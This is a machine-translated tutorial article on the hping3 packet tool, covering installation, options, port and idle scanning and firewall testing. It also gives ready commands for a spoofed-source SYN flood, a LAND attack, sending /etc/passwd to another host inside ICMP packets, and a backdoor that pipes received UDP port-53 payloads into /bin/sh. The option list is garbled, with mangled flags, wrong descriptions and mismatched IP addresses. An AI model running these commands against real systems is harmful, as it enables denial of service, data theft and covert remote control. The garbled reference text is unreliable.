Shulou(Shulou.com)06/01 Report--

This article will explain in detail what is the use of the hping3 command in Linux. The editor thinks it is very practical, so I share it for you as a reference. I hope you can get something after reading this article.

The common Linux command hping is an open source tool for generating and parsing TCPIP protocol packets. The creator is Salvatore Sanfilippo. The latest version is hping3, which supports automated calls to its API using tcl scripts.

Hping3 tests the security of networks and hosts

It is added that hping is a standard tool for security audit, firewall testing and so on. The advantage of hping is that it can customize all parts of the packet, so users can flexibly detect the target machine in detail.

Install yum install libpcap-devel tc-devel ln-s / usr/include/pcap-bpf.h / usr/include/net/bpf.h wget http://www.hping.org/hping3-20051105.tar.gz tar zxvf hping3-20051105.tar.gz cd hping3-20051105. / configure make make install option-H-- help display help. -v-VERSION version information. -c-- the number of times count count sends packets about countreached_timeout can be edited in hping2.h. -I-- the default time between sending interval packets (in milliseconds) is 1 second. This feature is very important in increasing the transmission rate, and it will also be used in idle/spoofing scanning. You can refer to hping-howto for more information-fast sends 10 packets per second. -n-nmeric digital output, symbolically output host address. -Q-quiet exits. -I-- interface interface name is nothing more than a parameter like eth0. -v-- verbose displays a lot of information, TCP responses generally such as: len=46 ip=192.168.1.1 flags=RADF seq=0 ttl=255 id=0 win=0 rtt=0.4ms tos=0 iplen=40 seq=0 ack=1380893504 sum=2010 urp=0-D-- debug enters debug mode when you are in trouble, such as using HPING to encounter some unaccustomed situations, you can use this mode to modify the use of HPING, (INTERFACE DETECTION,DATA LINK LAYER ACCESS,INTERFACE SETTINGS,.)-z-bind shortcuts. -Z-- unbind eliminates keyboard shortcuts. -O-- rawip RAWIP mode, in which HPING sends IP headers with data. -1-- icmp ICMP mode. In this mode, HPING will send an IGMP reply. You can use the-- ICMPTYPE-- ICMPCODE option to send ICMP messages of other types / modes. -2-- udp UDP mode. By default, HPING sends UDP messages to port 0 of the host. You can specify its mode with the-- baseport-- destport-- keep option. -9-- the listen mode of listen signatuer hping, in which HPING receives the specified data. -spoof hostname fake IP attacks, the firewall will not record your real IP, and of course you won't receive the response packets. -t-- ttl time to live can specify the TTL value at which the package is sent. H-- ipproto chooses the IP protocol in RAW IP mode. -w-- WINID UNIX, WINDIWS's id response is different, this option allows your ID response to be the same as WINDOWS. -r-- rel changes ID so that ID can decrement the output. For more information, please see HPING-HOWTO. -F-- FRAG changes the FRAG of the package, which tests the other party's ability to handle packet fragments. The default "virtual mtu" is 16 bytes. -x-- morefrag this feature can send fragments to keep the host busy recovering the fragments, resulting in a denial of service on the host. -y-dontfrag sends unrecoverable IP fragments, which allows you to learn more about MTU PATH DISCOVERY. -G-- fragoff fragment offset value set the fragment offset-m-- mtu mtu value the ID value becomes very large after using this item, about 3000-20000 when 50000 does not specify this item. -G-- rroute records routes, can see detailed data, etc., and can pass through up to 9 routes, even if the host blocks ICMP messages. -C-- ICMPTYPE type specifies the ICMP type, and the default is ICMP echo REQUEST. -K-- ICMPCODE CODE specifies the ICMP code. The default is 0. Icmp-ipver also inserts the IP version into the IP header. Icmp-iphlen sets the length of the IP header, which defaults to 5 (32 bytes). -- icmp-iplen sets the IP packet length. -- icmp-ipid sets the ID of the IP header of the ICMP message. Default is RANDOM. -- icmp-ipproto sets the protocol. The default is TCP. -icmp-cksum sets the checksum. -icmp-ts alias for-- icmptype 13 (to send ICMP timestamp requests)-- icmp-addr Alias for-- icmptype 17 (to send ICMP address mask requests)-s-baseport source port hping guesses the response packets using the source port. It counts from a basic port and adds 1 to each packet received. You can define this rule yourself. -p-- deskport [+] [+] deskport sets the destination port. The default is 0. A plus sign is set to add 1 for each request packet sent, and the two plus signs are: for each packet sent, the number of ports plus 1. -- keep said above. -w-- the size of win is the same as that of windows, 64BYTE. -O-- tcpoff Set fake tcp data offset. Normal data offset is tcphdrlen / 4.-m-- tcpseq sets the number of TCP sequences. -l-- tcpck sets TCP ack. Q-seqnum collects serial numbers, which is very useful for you to analyze TCP serial numbers. Hping3 function Hping3 mainly has the following typical functional applications:

# Firewall testing uses Hping3 to specify various packet fields, and then tests the firewall in detail. Please refer to: http://0daysecurity.com/articles/hping3_examples.html

Test the firewall's response to ICMP packets, whether it supports traceroute, whether a port is open, and conduct a denial of service attack (DoS attack) against the firewall. For example, test the target firewall in LandAttack (LandAttack sets the sending source address to be the same as the destination address, luring the target machine to establish a continuous connection with itself).

Hping3-S-c 1000000-a 10.10.10.10-p 21 10.10.10.1 Port scan Hping3 can also scan the target port. Hping3 supports specifying TCP flag bits, length, and other information. The following example can be used to detect whether port 80 of the target machine is open:

Hping3-I eth0-S 192.168.10.1-p 80 where-I eth0 specifies to use the eth0 port, and-S specifies the flag bit SYN,-p 80 of the TCP packet to specify the destination port for the probe.

Hping3 supports a wide range of port detection methods, and hping3 supports almost all the scanning methods owned by nmap (except for connect mode, because Hping3 only sends and receives packets and does not maintain a connection, so connect detection is not supported). Moreover, Hping3 can control the detection sent more finely, which makes it convenient for users to fine-tune the detection results. Of course, the port scanning performance and comprehensive processing power of Hping3 can not be compared with Nmap. It is generally used to scan only a small number of ports on a small number of hosts.

# Idle scanning Idle scanning (Idle Scanning) is a way to scan remote hosts anonymously, which was also invented by Salvatore Sanfilippo, the author of Hping3, and Idle scanning is also implemented in Nmap.

The scanning principle is to find an idle host (the host does not have any network traffic, and the IPID is growing one by one). The attacking host first sends a probe packet to the idle host and obtains its IPID from the reply packet. Pretending to be the IP address of the idle host sends the SYN packet to the port of the remote host (assumed here as the SYN packet). If the destination port of the remote host is open, the SYN/ACK will be replied, and the idle host will reply to the RST packet after receiving the SYN/ACK. Then the attacking host sends a probe packet to the idle host to obtain its IPID. Then comparing the IPID values of the two times, we can determine whether the remote host has replied to the packet or not, thus indirectly speculating its port status.

# denial of service attacks use Hping3 to facilitate the construction of denial of service attacks. For example, a large number of SYN connections are initiated to the target, spoofing the source address as 192.168.10.99, and sending each SYN packet at an interval of 1000 microseconds.

Hping3-I eth0-a 192.168.10.99-S 192.168.10.33-p 80-I U1000 other attacks such as smurf, teardrop, land attack are also easy to build.

# File transfer Hping3 supports file transfer through packages such as TCP/UDP/ICMP. It is equivalent to establishing secret tunnel communication with the help of TCP/UDP/ICMP package. The implementation is to open the listening port and parse the contents of the detected signature (the signature is a string specified by the user). Start the service at the receiving end:

Hping3 192.168.1.159--listen signature-- safe-- icmp listens for signatures in ICMP packages and parses the contents of the file according to the signatures.

Send the file at the sender using a signed packaged ICMP package:

Hping3 192.168.1.108--icmp? d 100-- sign signature-- file / etc/passwd passes the / etc/passwd password file to the 192.168.10.44 host through the ICMP package. The send packet size is 100 bytes (- d 100) and the send signature is signature (- sign signature).

# Trojan function if Hping3 can be started on a remote host, it can be used as a Trojan program to start the listening port and open shell communication after establishing a connection. Similar to the backdoor function of netcat.

Example: open UDP port 53 locally (DNS parsing service) to listen for packets containing signatures of signature from 192.168.10.66 host, and call / bin/sh to execute the received data.

At the startup end of the Trojan:

Hping3 192.168.10.66--listen signature-- safe-- udp-P53 | / bin/sh on the remote control side:

Echo ls > test.cmd hping3 192.168.10.44-p53-d 100-- udp-- sign siganature-- file. / test.cmd sends the file containing the ls command with the signature signature to UDP port 53 of the 192.168.10.44 host. The packet data length is 100 bytes.

Of course, this is just a simple demonstration program, the real scenario, the control side can benefit shell to perform a lot of advanced and complex operations.

This is the end of this article on "what is the use of hping3 commands in Linux?". I hope the above content can be of some help to you, so that you can learn more knowledge. if you think the article is good, please share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.